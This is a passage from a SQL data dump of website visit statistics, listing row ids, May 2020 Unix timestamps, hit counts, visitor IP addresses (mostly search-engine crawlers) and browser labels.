,0,'77.120.98.235','other'),(505774,1589673305,1,1,0,0,'62.205.134.182','other'),(505775,1589673484,1,1,0,0,'207.46.13.131','other'),(505776,1589674381,2,2,0,0,'66.249.70.72','chrome'),(505777,1589674476,1,1,0,0,'213.180.203.101','other'),(505778,1589674652,1,1,0,0,'66.249.70.69','chrome'),(505779,1589675014,1,1,0,0,'66.249.70.70','chrome'),(505780,1589675219,1,1,0,0,'92.100.16.92','chrome'),(505781,1589675631,1,1,0,0,'66.249.70.69','chrome'),(505782,1589675935,1,1,0,0,'54.194.176.244','chrome'),(505783,1589676036,1,1,0,0,'178.154.200.220','other'),(505784,1589676803,8,8,0,0,'77.120.98.235','other'),(505785,1589676991,1,1,0,0,'66.249.64.36','chrome'),(505786,1589677305,1,1,0,0,'178.154.200.86','other'),(505787,1589677473,1,1,0,0,'66.249.70.72','chrome'),(505788,1589677615,1,1,0,0,'178.154.200.222','other'),(505789,1589678646,1,1,0,0,'66.249.70.69','chrome'),(505790,1589679456,1,1,0,0,'66.249.70.72','chrome'),(505791,1589679736,1,1,0,0,'207.46.13.92','other'),(505792,1589680037,1,1,0,0,'178.154.200.222','other'),(505793,1589680323,1,1,0,0,'91.196.178.117','chrome'),(505794,1589680532,8,8,0,0,'77.120.98.235','other'),(505795,1589680647,1,1,0,0,'113.23.167.228','firefox'),(505796,1589680683,1,1,0,0,'213.180.203.142','other'),(505797,1589680828,1,1,0,0,'213.180.203.90','other'),(505798,1589680894,1,1,0,0,'213.180.203.16','other'),(505799,1589680908,1,1,0,0,'207.46.13.92','other'),(505800,1589680950,1,1,0,0,'207.46.13.84','other'),(505801,1589682530,1,1,0,0,'8.29.198.25','other'),(505802,1589682757,1,1,0,0,'8.29.198.26','other'),(505803,1589683373,1,1,0,0,'207.46.13.92','other'),(505804,1589684316,8,8,0,0,'77.120.98.235','other'),(505805,1589684629,1,1,0,0,'213.180.203.16','other'),(505806,1589686527,1,1,0,0,'178.154.200.222','other'),(505807,1589686822,3,3,0,0,'35.232.43.135','chrome'),(505808,1589686839,3,3,0,0,'35.226.197.130','chrome'),(505809,1589686848,4,4,0,0,'34.68.20.177','chrome'),(505811,1589688045,8,8,0,0,'77.120.98.235','other'),(505812,1589688060,2,2,0,0,'207.46.13.7','other'),(505813,1589688415,1,1,0,0,'207.46.13.84','other'),(505814,1589688636,2,2,0,0,'178.154.200.222','other'),(505815,1589690401,1,1,0,0,'66.249.70.72','chrome'),(505816,1589690971,1,1,0,0,'62.205.134.182','other'),(505817,1589691029,3,3,0,0,'66.249.70.69','chrome'),(505818,1589691391,3,3,0,0,'66.249.70.70','chrome'),(505819,1589691795,2,2,0,0,'178.154.200.222','other'),(505820,1589692058,1,1,0,0,'207.46.13.7','other'),(505821,1589692165,8,8,0,0,'77.120.98.235','other'),(505822,1589692173,1,1,0,0,'66.249.70.69','chrome'),(505823,1589692715,1,1,0,0,'213.180.203.16','other'),(505824,1589693261,1,1,0,0,'178.154.200.222','other'),(505825,1589693356,2,2,0,0,'8.29.198.26','other'),(505826,1589694167,2,2,0,0,'178.154.200.222','other'),(505827,1589694293,1,1,0,0,'178.154.200.220','other'),(505828,1589694700,1,1,0,0,'207.46.13.7','other'),(505829,1589694994,2,2,0,0,'46.219.204.150','chrome'),(505830,1589695409,1,1,0,0,'207.46.13.84','other'),(505831,1589695752,1,1,0,0,'178.154.200.222','other'),(505832,1589696688,8,8,0,0,'77.120.98.235','other'),(505833,1589697011,2,2,0,0,'66.249.70.69','chrome'),(505834,1589697955,1,1,0,0,'66.249.70.72','chrome'),(505835,1589698578,1,1,0,0,'66.249.70.70','chrome'),(505836,1589698724,1,1,0,0,'66.249.70.69','chrome'),(505837,1589698846,1,1,0,0,'173.212.233.72','firefox'),(505838,1589699039,1,1,0,0,'213.180.203.16','other'),(505839,1589699610,2,2,0,0,'207.46.13.84','other'),(505840,1589700039,1,1,0,0,'213.180.203.95','other'),(505841,1589700105,1,1,0,0,'91.196.178.21','chrome'),(505842,1589700118,3,3,0,0,'207.46.13.7','other'),(505843,1589700540,2,2,0,0,'66.249.70.70','chrome'),(505844,1589700742,1,1,0,0,'131.220.6.152','chrome'),(505845,1589701515,1,1,0,0,'66.249.70.70','chrome'),(505846,1589701553,8,8,0,0,'77.120.98.235','other'),(505847,1589701578,1,1,0,0,'178.154.200.196','other'),(505848,1589701736,1,1,0,0,'66.249.64.36','chrome'),(505849,1589701944,1,1,0,0,'31.13.127.2','other'),(505850,1589702450,1,1,0,0,'213.180.203.16','other'),(505851,1589702596,2,2,0,0,'66.249.70.70','chrome'),(505852,1589702782,1,1,0,0,'150.95.104.221','chrome'),(505853,1589703225,2,2,0,0,'66.249.70.72','chrome'),(505854,1589703905,2,2,0,0,'66.249.70.69','chrome'),(505855,1589704113,1,1,0,0,'66.249.64.33','chrome'),(505856,1589704184,1,1,0,0,'8.29.198.25','other'),(505857,1589704413,1,1,0,0,'8.29.198.27','other'),(505858,1589704655,2,2,0,0,'178.154.200.222','other'),(505859,1589704832,1,1,0,0,'88.155.116.249','chrome'),(505860,1589704835,1,1,0,0,'188.163.75.43','msie'),(505861,1589705540,2,2,0,0,'207.46.13.7','other'),(505862,1589705746,1,1,0,0,'213.180.203.16','other'),(505863,1589705993,1,1,0,0,'207.46.13.84','other'),(505864,1589706079,1,1,0,0,'66.249.70.70','chrome'),(505865,1589706383,1,1,0,0,'66.249.70.69','chrome'),(505866,1589706659,8,8,0,0,'77.120.98.235','other'),(505867,1589707066,1,1,0,0,'207.46.13.183','other'),(505868,1589707368,1,1,0,0,'66.249.64.33','chrome'),(505869,1589707956,1,1,0,0,'207.46.13.84','other'),(505870,1589708064,1,1,0,0,'213.180.203.16','other'),(505871,1589708403,2,2,0,0,'178.154.200.222','other'),(505872,1589709097,1,1,0,0,'207.46.13.183','other'),(505873,1589709431,1,1,0,0,'207.46.13.7','other'),(505874,1589709521,1,1,0,0,'178.154.200.222','other'),(505875,1589709670,3,3,0,0,'66.249.64.38','chrome'),(505876,1589710538,1,1,0,0,'207.46.13.183','other'),(505877,1589710550,2,2,0,0,'178.154.200.222','other'),(505878,1589711377,1,1,0,0,'148.251.98.195','other'),(505879,1589711754,8,8,0,0,'77.120.98.235','other'),(505880,1589712954,1,1,0,0,'66.249.70.72','chrome'),(505881,1589713097,2,2,0,0,'207.46.13.183','other'),(505882,1589714064,1,1,0,0,'178.154.200.222','other'),(505883,1589714099,1,1,0,0,'66.249.70.69','chrome'),(505884,1589714472,3,3,0,0,'207.46.13.183','other'),(505885,1589714647,1,1,0,0,'109.74.154.72','chrome'),(505886,1589715014,1,1,0,0,'8.29.198.27','other'),(505887,1589715118,2,2,0,0,'178.154.200.222','other'),(505888,1589715121,1,1,0,0,'66.249.70.72','chrome'),(505889,1589715192,2,2,0,0,'207.46.13.7','other'),(505890,1589715239,1,1,0,0,'8.29.198.26','other'),(505891,1589716108,2,2,0,0,'178.154.200.222','other'),(505892,1589716720,1,1,0,0,'66.249.70.72','chrome'),(505893,1589716816,8,8,0,0,'77.120.98.235','other'),(505894,1589716818,1,1,0,0,'66.249.70.69','chrome'),(505895,1589716998,1,1,0,0,'213.180.203.16','other'),(505896,1589718105,1,1,0,0,'178.154.200.222','other'),(505897,1589718122,2,2,0,0,'207.46.13.183','other'),(505898,1589718140,1,1,0,0,'207.46.13.84','other'),(505899,1589719971,3,3,0,0,'207.46.13.7','other'),(505900,1589720017,1,1,0,0,'178.154.200.19','other'),(505901,1589720161,1,1,0,0,'207.46.13.183','other'),(505902,1589720312,1,1,0,0,'66.249.70.72','chrome'),(505903,1589721133,1,1,0,0,'207.46.13.7','other'),(505904,1589721174,3,3,0,0,'178.154.200.222','other'),(505905,1589721729,2,2,0,0,'207.46.13.183','other'),(505906,1589722011,1,1,0,0,'178.154.200.220','other'),(505907,1589722459,1,1,0,0,'66.249.70.69','chrome'),(505908,1589722551,1,1,0,0,'207.46.13.7','other'),(505909,1589723338,8,8,0,0,'77.120.98.235','other'),(505910,1589723512,1,1,0,0,'178.154.200.222','other'),(505911,1589723565,1,1,0,0,'207.46.13.183','other'),(505912,1589724255,1,1,0,0,'207.46.13.7','other'),(505913,1589724898,1,1,0,0,'207.46.13.183','other'),(505914,1589725835,1,1,0,0,'8.29.198.27','other'),(505915,1589726061,1,1,0,0,'8.29.198.26','other'),(505916,1589726122,1,1,0,0,'178.154.200.222','other'),(505917,1589726692,1,1,0,0,'84.94.175.80','chrome'),(505918,1589726718,1,1,0,0,'213.180.203.16','other'),(505919,1589726836,1,1,0,0,'207.46.13.7','other'),(505920,1589727748,1,1,0,0,'192.71.2.171','other'),(505921,1589728058,1,1,0,0,'178.154.200.222','other'),(505922,1589729322,1,1,0,0,'37.53.225.93','chrome'),(505923,1589729464,1,1,0,0,'66.249.70.70','chrome'),(505924,1589730932,1,1,0,0,'178.154.200.196','other'),(505925,1589731046,2,2,0,0,'207.46.13.183','other'),(505926,1589731349,1,1,0,0,'66.249.70.70','chrome'),(505927,1589732100,1,1,0,0,'31.13.127.120','other'),(505928,1589732101,1,1,0,0,'31.13.127.24','other'),(505931,1589732583,1,1,0,0,'49.198.234.240','other'),(505932,1589732832,2,2,0,0,'178.154.200.222','other'),(505933,1589733491,1,1,0,0,'207.46.13.183','other'),(505934,1589735020,1,1,0,0,'207.46.13.183','other'),(505935,1589735230,1,1,0,0,'178.154.200.222','other'),(505936,1589735661,1,1,0,0,'66.249.70.69','chrome'),(505937,1589735718,1,1,0,0,'178.154.200.220','other'),(505938,1589736663,2,2,0,0,'8.29.198.27','other'),(505939,1589736718,2,1,1,0,'66.249.70.70',''),(505940,1589737226,1,1,0,0,'66.249.70.69','chrome'),(505941,1589737252,2,2,0,0,'91.196.178.21','chrome'),(505942,1589737520,1,1,0,0,'178.154.200.222','other'),(505943,1589738241,1,1,0,0,'207.46.13.4','other'),(505944,1589738265,8,8,0,0,'77.120.98.235','other'),(505945,1589738371,2,2,0,0,'18.188.136.39','chrome'),(505946,1589738887,3,3,0,0,'207.46.13.153','other'),(505947,1589739085,2,2,0,0,'195.154.242.189','chrome'),(505948,1589739088,2,2,0,0,'195.154.242.89','chrome'),(505949,1589739098,2,2,0,0,'62.210.177.44','chrome'),(505950,1589739739,1,1,0,0,'213.180.203.16','other'),(505951,1589739845,1,1,0,0,'66.249.70.72','chrome'),(505952,1589739857,2,2,0,0,'66.249.70.69','chrome'),(505953,1589740242,8,8,0,0,'77.120.98.235','other'),(505954,1589740394,2,2,0,0,'66.249.70.70','chrome'),(505955,1589740742,2,2,0,0,'157.55.39.154','other'),(505956,1589740806,1,1,0,0,'91.196.178.21','chrome'),(505957,1589741836,1,1,0,0,'66.249.70.69','chrome'),(505958,1589741841,2,2,0,0,'157.55.39.154','other'),(505959,1589741940,1,1,0,0,'66.249.70.72','chrome'),(505960,1589742235,1,1,0,0,'66.249.64.36','chrome'),(505961,1589742355,1,1,0,0,'157.55.39.99','other'),(505962,1589742475,8,8,0,0,'77.120.98.235','other'),(505963,1589742981,1,1,0,0,'207.46.13.153','other'),(505964,1589743495,2,2,0,0,'66.249.70.69','chrome'),(505965,1589743624,1,1,0,0,'66.249.70.72','chrome'),(505966,1589744661,8,8,0,0,'77.120.98.235','other'),(505967,1589744701,1,0,1,0,'66.249.70.70',''),(505968,1589745784,1,1,0,0,'207.46.13.153','other'),(505969,1589746041,1,1,0,0,'66.249.70.69','chrome'),(505970,1589746043,2,2,0,0,'66.249.70.70','chrome'),(505971,1589746856,8,8,0,0,'77.120.98.235','other'),(505972,1589747219,1,1,0,0,'173.252.111.22','other'),(505973,1589747220,1,1,0,0,'173.252.111.116','other'),(505974,1589747239,1,1,0,0,'66.249.70.72','chrome'),(505975,1589747359,1,1,0,0,'194.61.24.94','other'),(505976,1589747486,1,1,0,0,'8.29.198.26','other'),(505977,1589747613,1,1,0,0,'66.249.70.70','chrome'),(505978,1589747642,1,1,0,0,'207.46.13.153','other'),(505979,1589747673,1,1,0,0,'66.249.70.69','chrome'),(505980,1589747711,1,1,0,0,'8.29.198.25','other'),(505981,1589748189,1,1,0,0,'2.47.39.213','other'),(505982,1589748374,1,1,0,0,'66.249.70.72','chrome'),(505983,1589748724,1,1,0,0,'66.249.64.36','chrome'),(505984,1589749094,8,8,0,0,'77.120.98.235','other'),(505985,1589750423,2,2,0,0,'66.249.70.69','chrome'),(505986,1589750785,2,2,0,0,'66.249.70.70','chrome'),(505987,1589751156,2,2,0,0,'157.55.39.99','other'),(505988,1589751247,1,1,0,0,'157.55.39.154','other'),(505989,1589751289,8,8,0,0,'77.120.98.235','other'),(505990,1589751488,1,1,0,0,'66.249.64.33','chrome'),(505991,1589752382,1,1,0,0,'66.249.70.72','chrome'),(505992,1589753382,1,1,0,0,'85.10.56.254','chrome'),(505993,1589753440,8,8,0,0,'77.120.98.235','other'),(505994,1589754348,1,1,0,0,'66.249.70.70','chrome'),(505995,1589755534,1,1,0,0,'91.209.11.236','other'),(505996,1589755539,8,8,0,0,'77.120.98.235','other'),(505997,1589755564,1,1,0,0,'207.46.13.60','other'),(505998,1589755705,1,1,0,0,'157.55.39.154','other'),(505999,1589755802,1,1,0,0,'178.154.200.220','other'),(506000,1589755985,1,1,0,0,'185.209.0.8','msie'),(506001,1589756354,1,1,0,0,'178.154.200.222','other'),(506002,1589756817,2,2,0,0,'157.55.39.154','other'),(506003,1589757228,2,2,0,0,'207.46.13.153','other'),(506004,1589757485,1,1,0,0,'66.249.70.69','chrome'),(506005,1589757566,1,1,0,0,'207.46.13.111','other'),(506006,1589757623,8,8,0,0,'77.120.98.235','other'),(506007,1589757649,1,1,0,0,'66.249.70.72','chrome'),(506008,1589757903,1,1,0,0,'213.180.203.142','other'),(506009,1589758312,1,1,0,0,'8.29.198.27','other'),(506010,1589758324,1,1,0,0,'157.55.39.154','other'),(506011,1589758349,1,1,0,0,'194.60.254.242','other'),(506012,1589758530,1,1,0,0,'8.29.198.26','other'),(506013,1589758705,2,2,0,0,'66.249.70.69','chrome'),(506014,1589759176,1,1,0,0,'213.180.203.16','other'),(506015,1589759349,1,1,0,0,'178.154.200.222','other'),(506016,1589759706,1,1,0,0,'62.205.134.182','other'),(506017,1589759726,8,8,0,0,'77.120.98.235','other'),(506018,1589759969,3,3,0,0,'66.249.70.72','chrome'),(506019,1589760258,1,1,0,0,'157.55.39.154','other'),(506020,1589760297,1,1,0,0,'66.249.64.33','chrome'),(506021,1589760449,1,1,0,0,'66.249.70.70','chrome'),(506022,1589760521,1,1,0,0,'207.46.13.202','other'),(506023,1589760686,1,1,0,0,'178.154.200.176','other'),(506024,1589760925,1,1,0,0,'66.249.70.72','chrome'),(506025,1589761189,1,1,0,0,'178.154.200.222','other'),(506026,1589761680,2,2,0,0,'207.46.13.111','other'),(506027,1589761769,1,1,0,0,'66.249.70.70','chrome'),(506028,1589761797,8,8,0,0,'77.120.98.235','other'),(506029,1589762019,1,1,0,0,'213.180.203.16','other'),(506030,1589762325,1,1,0,0,'178.154.200.97','other'),(506031,1589762535,1,1,0,0,'66.249.70.72','chrome'),(506032,1589763504,2,2,0,0,'178.154.200.222','other'),(506033,1589763793,8,8,0,0,'77.120.98.235','other'),(506034,1589764233,1,1,0,0,'66.249.70.72','chrome'),(506035,1589764272,1,1,0,0,'176.100.191.30','chrome'),(506036,1589764449,4,4,0,0,'178.154.200.222','other'),(506037,1589765141,1,1,0,0,'213.180.203.16','other'),(506038,1589765555,3,3,0,0,'178.154.200.222','other'),(506039,1589765799,8,8,0,0,'77.120.98.235','other'),(506040,1589766557,1,1,0,0,'178.154.200.222','other'),(506041,1589766857,2,2,0,0,'207.46.13.111','other'),(506042,1589767143,1,1,0,0,'213.180.203.95','other'),(506043,1589767739,8,8,0,0,'77.120.98.235','other'),(506044,1589767770,1,1,0,0,'207.46.13.111','other'),(506045,1589767870,1,1,0,0,'213.180.203.16','other'),(506046,1589768092,1,1,0,0,'178.154.200.207','other'),(506047,1589768100,1,1,0,0,'213.180.203.54','other'),(506048,1589768327,1,1,0,0,'213.180.203.142','other'),(506049,1589768422,1,1,0,0,'157.55.39.154','other'),(506050,1589768513,1,1,0,0,'207.46.13.153','other'),(506051,1589768679,1,1,0,0,'178.154.200.222','other'),(506052,1589768767,1,1,0,0,'213.180.203.81','other'),(506053,1589768885,2,2,0,0,'207.46.13.111','other'),(506054,1589769141,1,1,0,0,'8.29.198.26','other'),(506055,1589769353,1,1,0,0,'8.29.198.25','other'),(506056,1589769759,8,8,0,0,'77.120.98.235','other'),(506057,1589769811,1,1,0,0,'157.55.39.154','other'),(506058,1589769857,1,1,0,0,'178.154.200.222','other'),(506059,1589769996,1,1,0,0,'178.154.200.220','other'),(506060,1589770137,2,2,0,0,'213.180.203.16','other'),(506061,1589770726,1,1,0,0,'207.46.13.111','other'),(506062,1589770728,1,1,0,0,'178.154.200.236','other'),(506063,1589771029,1,1,0,0,'178.154.200.196','other'),(506064,1589771404,2,2,0,0,'178.154.200.222','other'),(506065,1589771626,8,8,0,0,'77.120.98.235','other'),(506066,1589772870,2,2,0,0,'207.46.13.111','other'),(506067,1589773630,8,8,0,0,'77.120.98.235','other'),(506068,1589773862,1,1,0,0,'207.46.13.50','other'),(506069,1589773901,1,1,0,0,'213.180.203.36','other'),(506070,1589774268,2,2,0,0,'178.154.200.222','other'),(506071,1589774863,1,1,0,0,'207.46.13.111','other'),(506072,1589775667,4,4,0,0,'178.154.200.222','other'),(506073,1589775688,8,8,0,0,'77.120.98.235','other'),(506074,1589775956,2,2,0,0,'157.55.39.154','other'),(506075,1589776479,2,2,0,0,'207.46.13.111','other'),(506076,1589776921,1,1,0,0,'13.66.139.0','other'),(506077,1589776977,1,1,0,0,'207.46.13.50','other'),(506078,1589777415,1,1,0,0,'62.205.134.182','other'),(506079,1589777823,8,8,0,0,'77.120.98.235','other'),(506080,1589777996,3,3,0,0,'178.154.200.222','other'),(506081,1589778125,1,1,0,0,'66.249.70.69','chrome'),(506082,1589778438,1,1,0,0,'213.180.203.16','other'),(506083,1589778445,2,2,0,0,'207.46.13.50','other'),(506084,1589779081,3,3,0,0,'178.154.200.222','other'),(506085,1589779854,2,2,0,0,'207.46.13.111','other'),(506086,1589779968,1,1,0,0,'8.29.198.26','other'),(506087,1589779983,8,8,0,0,'77.120.98.235','other'),(506088,1589780184,1,1,0,0,'8.29.198.25','other'),(506089,1589780254,4,4,0,0,'178.154.200.222','other'),(506090,1589781618,1,1,0,0,'213.180.203.16','other'),(506091,1589782097,3,3,0,0,'178.154.200.222','other'),(506092,1589782151,8,8,0,0,'77.120.98.235','other'),(506093,1589782202,1,1,0,0,'194.60.254.242','other'),(506094,1589783204,1,1,0,0,'207.46.13.50','other'),(506095,1589783373,1,1,0,0,'157.55.39.154','other'),(506096,1589783815,1,1,0,0,'178.154.200.222','other'),(506097,1589783932,1,1,0,0,'207.46.13.111','other'),(506098,1589783976,1,1,0,0,'66.249.70.70','chrome'),(506099,1589784329,8,8,0,0,'77.120.98.235','other'),(506100,1589784365,1,1,0,0,'66.249.70.69','chrome'),(506101,1589785264,2,2,0,0,'178.154.200.222','other'),(506102,1589785300,1,1,0,0,'207.46.13.111','other'),(506103,1589786234,2,2,0,0,'178.154.200.222','other'),(506104,1589786445,1,1,0,0,'51.77.52.160','chrome'),(506105,1589786519,8,8,0,0,'77.120.98.235','other'),(506106,1589787004,1,1,0,0,'207.46.13.111','other'),(506107,1589787253,1,1,0,0,'131.220.6.152','chrome'),(506108,1589787394,1,1,0,0,'178.154.200.222','other'),(506109,1589787460,1,1,0,0,'66.249.70.70','chrome'),(506110,1589787526,1,1,0,0,'193.106.139.50','chrome'),(506111,1589787564,1,1,0,0,'213.180.203.16','other'),(506112,1589787709,1,1,0,0,'178.154.200.220','other'),(506113,1589788669,8,8,0,0,'77.120.98.235','other'),(506114,1589789021,4,4,0,0,'157.55.39.154','other'),(506115,1589789042,1,1,0,0,'207.46.13.50','other'),(506116,1589789148,1,1,0,0,'159.253.19.48','chrome'),(506117,1589789695,1,1,0,0,'213.180.203.16','other'),(506118,1589790795,2,2,0,0,'8.29.198.26','other'),(506119,1589790862,8,8,0,0,'77.120.98.235','other'),(506120,1589791112,1,1,0,0,'66.249.70.72','chrome'),(506121,1589791290,1,1,0,0,'178.154.200.191','other'),(506122,1589791757,3,3,0,0,'207.46.13.104','other'),(506123,1589792154,1,1,0,0,'213.180.203.16','other'),(506124,1589792157,1,1,0,0,'207.46.13.50','other'),(506125,1589792189,1,1,0,0,'178.250.54.207','chrome'),(506126,1589792396,2,2,0,0,'50.87.144.102','chrome'),(506127,1589792696,1,1,0,0,'207.46.13.104','other'),(506128,1589792719,1,1,0,0,'91.196.178.170','chrome'),(506129,1589793027,8,8,0,0,'77.120.98.235','other'),(506130,1589793064,1,1,0,0,'213.180.203.16','other'),(506131,1589793111,1,1,0,0,'178.154.200.220','other'),(506132,1589793394,1,1,0,0,'193.201.98.78','chrome'),(506133,1589793581,1,1,0,0,'157.55.39.154','other'),(506134,1589793592,1,1,0,0,'66.249.70.70','chrome'),(506135,1589795024,2,2,0,0,'199.201.90.13','chrome'),(506136,1589795233,8,8,0,0,'77.120.98.235','other'),(506137,1589795265,2,2,0,0,'207.46.13.104','other'),(506138,1589795574,1,1,0,0,'178.154.200.87','other'),(506139,1589795595,1,1,0,0,'213.180.203.142','other'),(506140,1589795798,1,1,0,0,'178.154.200.222','other'),(506141,1589795863,1,1,0,0,'13.59.107.106','chrome'),(506142,1589796339,1,1,0,0,'72.249.30.163','chrome'),(506143,1589796567,1,1,0,0,'213.180.203.16','other'),(506144,1589796859,1,1,0,0,'162.241.219.68','chrome'),(506145,1589797174,1,1,0,0,'178.154.200.87','other'),(506146,1589797486,8,8,0,0,'77.120.98.235','other'),(506147,1589797836,1,1,0,0,'213.180.203.122','other'),(506148,1589798711,1,1,0,0,'178.154.200.222','other'),(506149,1589798930,2,2,0,0,'207.46.13.50','other'),(506150,1589799119,1,1,0,0,'213.180.203.155','other'),(506151,1589799228,1,1,0,0,'213.180.203.16','other'),(506152,1589799465,1,1,0,0,'178.154.200.220','other'),(506153,1589799700,8,8,0,0,'77.120.98.235','other'),(506154,1589799771,1,1,0,0,'213.180.203.2','other'),(506155,1589799989,1,1,0,0,'213.180.203.50','other'),(506156,1589800566,1,1,0,0,'95.133.48.53','chrome'),(506157,1589800626,31,31,0,0,'5.9.156.121','other'),(506158,1589800855,1,1,0,0,'109.74.154.72','chrome'),(506159,1589801615,1,1,0,0,'178.154.200.92','other'),(506160,1589801623,2,2,0,0,'8.29.198.26','other'),(506161,1589801966,1,1,0,0,'178.154.200.222','other'),(506162,1589801987,8,8,0,0,'77.120.98.235','other'),(506163,1589802338,1,1,0,0,'108.167.158.25','chrome'),(506164,1589802543,2,2,0,0,'207.46.13.104','other'),(506165,1589802723,1,1,0,0,'91.196.177.207','chrome'),(506166,1589804227,8,8,0,0,'77.120.98.235','other'),(506167,1589804305,1,1,0,0,'178.154.200.222','other'),(506168,1589804887,1,1,0,0,'66.249.70.70','chrome'),(506169,1589805829,1,1,0,0,'178.154.200.220','other'),(506170,1589806224,1,1,0,0,'91.196.177.46','chrome'),(506171,1589806327,1,1,0,0,'46.211.32.160','chrome'),(506172,1589806471,8,8,0,0,'77.120.98.235','other'),(506173,1589806546,2,2,0,0,'66.249.70.72','chrome'),(506174,1589806760,1,1,0,0,'178.154.200.9','other'),(506175,1589807175,1,1,0,0,'207.46.13.50','other'),(506176,1589807263,1,1,0,0,'3.125.38.188','other'),(506177,1589807647,1,1,0,0,'13.66.139.0','other'),(506178,1589807837,1,1,0,0,'37.53.89.92','firefox'),(506179,1589808713,8,8,0,0,'77.120.98.235','other'),(506180,1589809295,1,1,0,0,'66.249.70.69','chrome'),(506181,1589809959,1,1,0,0,'94.153.5.69','chrome'),(506182,1589810948,2,2,0,0,'157.55.39.155','other'),(506183,1589810995,8,8,0,0,'77.120.98.235','other'),(506184,1589811202,1,1,0,0,'157.55.39.154','other'),(506185,1589811319,2,2,0,0,'89.46.104.189','chrome'),(506186,1589811474,1,1,0,0,'198.71.241.38','chrome'),(506187,1589811504,2,2,0,0,'192.185.83.99','chrome'),(506188,1589811531,1,1,0,0,'192.185.4.36','chrome'),(506189,1589811559,1,1,0,0,'108.167.189.60','chrome'),(506190,1589811703,1,1,0,0,'192.185.4.70','chrome'),(506191,1589811984,1,1,0,0,'207.46.13.50','other'),(506192,1589812333,1,1,0,0,'157.55.39.155','other'),(506193,1589812451,1,1,0,0,'8.29.198.25','other'),(506194,1589812547,1,1,0,0,'194.247.173.123','other'),(506195,1589812665,1,1,0,0,'8.29.198.27','other'),(506196,1589812711,1,1,0,0,'157.55.39.154','other'),(506197,1589812907,1,1,0,0,'178.128.221.21','chrome'),(506198,1589812958,1,1,0,0,'164.138.48.53','chrome'),(506199,1589813184,2,2,0,0,'108.167.189.55','chrome'),(506200,1589813259,1,1,0,0,'108.167.133.20','chrome'),(506201,1589813380,8,8,0,0,'77.120.98.235','other'),(506202,1589813414,2,2,0,0,'50.87.144.102','chrome'),(506203,1589813468,1,1,0,0,'66.249.70.69','chrome'),(506204,1589813469,1,1,0,0,'46.219.218.180','chrome'),(506205,1589813540,2,2,0,0,'35.209.188.207','chrome'),(506206,1589814725,1,1,0,0,'192.185.81.139','chrome'),(506207,1589814759,2,2,0,0,'192.185.4.130','chrome'),(506208,1589815002,1,1,0,0,'192.185.13.4','chrome'),(506209,1589815031,1,1,0,0,'51.68.11.227','chrome'),(506210,1589815282,1,1,0,0,'207.46.13.50','other'),(506211,1589815674,8,8,0,0,'77.120.98.235','other'),(506212,1589815874,1,1,0,0,'207.46.13.23','other'),(506213,1589816148,1,1,0,0,'66.249.64.33','chrome'),(506214,1589816265,2,2,0,0,'81.88.49.26','chrome'),(506215,1589816347,2,2,0,0,'207.46.13.50','other'),(506216,1589816350,1,1,0,0,'66.249.70.69','chrome'),(506217,1589816356,2,2,0,0,'112.213.89.109','chrome'),(506218,1589816444,1,1,0,0,'192.185.81.103','chrome'),(506219,1589816537,1,1,0,0,'192.185.4.174','chrome'),(506220,1589816746,6,6,0,0,'95.154.200.160','chrome'),(506221,1589816887,1,1,0,0,'192.185.4.76','chrome'),(506222,1589817131,2,2,0,0,'157.55.39.155','other'),(506223,1589817559,1,1,0,0,'108.167.189.31','chrome'),(506224,1589817741,1,1,0,0,'91.196.178.88','firefox'),(506225,1589817809,1,1,0,0,'164.138.48.53','chrome'),(506226,1589817848,2,2,0,0,'199.116.78.163','chrome'),(506227,1589817905,1,1,0,0,'138.201.10.206','chrome'),(506228,1589817943,1,1,0,0,'45.64.1.108','chrome'),(506229,1589817969,16,16,0,0,'77.120.98.235','other'),(506230,1589817997,1,1,0,0,'207.46.13.23','other'),(506231,1589818015,2,2,0,0,'192.185.81.156','chrome'),(506232,1589818017,1,1,0,0,'192.185.82.83','chrome'),(506233,1589818021,2,2,0,0,'185.225.36.61','chrome'),(506234,1589818154,1,1,0,0,'108.167.189.24','chrome'),(506235,1589818200,1,1,0,0,'207.46.13.50','other'),(506236,1589819306,1,1,0,0,'178.154.200.196','other'),(506237,1589819380,1,1,0,0,'213.180.203.16','other'),(506238,1589819408,1,1,0,0,'207.46.13.50','other'),(506239,1589819481,2,2,0,0,'194.165.49.113','chrome'),(506240,1589819589,1,1,0,0,'162.241.224.80','chrome'),(506241,1589819590,3,3,0,0,'157.55.39.155','other'),(506242,1589819619,2,2,0,0,'192.254.250.169','chrome'),(506243,1589819635,1,1,0,0,'50.87.144.137','chrome'),(506244,1589819649,1,1,0,0,'198.57.247.206','chrome'),(506245,1589819651,1,1,0,0,'207.46.13.23','other'),(506246,1589819911,1,1,0,0,'89.252.183.161','chrome'),(506247,1589819936,2,2,0,0,'186.64.117.235','chrome'),(506248,1589820817,1,1,0,0,'108.167.189.55','chrome'),(506249,1589821026,8,8,0,0,'77.120.98.235','other'),(506250,1589821146,2,2,0,0,'178.250.54.207','chrome'),(506251,1589821180,1,1,0,0,'192.185.83.130','chrome'),(506252,1589821363,1,1,0,0,'192.185.2.182','chrome'),(506253,1589821413,1,1,0,0,'108.167.133.20','chrome'),(506254,1589821642,1,1,0,0,'192.185.82.83','chrome'),(506255,1589821777,1,1,0,0,'207.46.13.50','other'),(506256,1589821859,1,1,0,0,'178.154.200.222','other'),(506257,1589821883,2,2,0,0,'178.154.200.45','other'),(506258,1589822139,2,2,0,0,'157.55.39.155','other'),(506259,1589822856,1,1,0,0,'192.185.2.115','chrome'),(506260,1589822920,1,1,0,0,'108.167.189.28','chrome'),(506261,1589822969,1,1,0,0,'192.185.4.66','chrome'),(506262,1589823002,1,1,0,0,'178.154.200.222','other'),(506263,1589823020,1,1,0,0,'108.167.189.15','chrome'),(506264,1589823280,1,1,0,0,'8.29.198.25','other'),(506265,1589823362,8,8,0,0,'77.120.98.235','other'),(506266,1589823494,1,1,0,0,'8.29.198.27','other'),(506267,1589824573,1,1,0,0,'198.57.247.206','chrome'),(506268,1589825447,1,1,0,0,'157.55.39.155','other'),(506269,1589825670,8,8,0,0,'77.120.98.235','other'),(506270,1589825873,2,2,0,0,'192.185.83.234','chrome'),(506271,1589825997,1,1,0,0,'192.185.2.34','chrome'),(506272,1589826173,1,1,0,0,'178.154.200.222','other'),(506273,1589826243,1,1,0,0,'192.185.12.172','chrome'),(506274,1589826369,2,2,0,0,'192.185.81.167','chrome'),(506275,1589826540,1,1,0,0,'192.185.4.32','chrome'),(506276,1589826577,1,1,0,0,'207.46.13.23','other'),(506277,1589826907,1,1,0,0,'94.153.48.90','chrome'),(506278,1589827531,1,1,0,0,'194.61.24.94','other'),(506279,1589827606,3,3,0,0,'50.87.144.53','chrome'),(506280,1589827830,1,1,0,0,'192.185.2.30','chrome'),(506281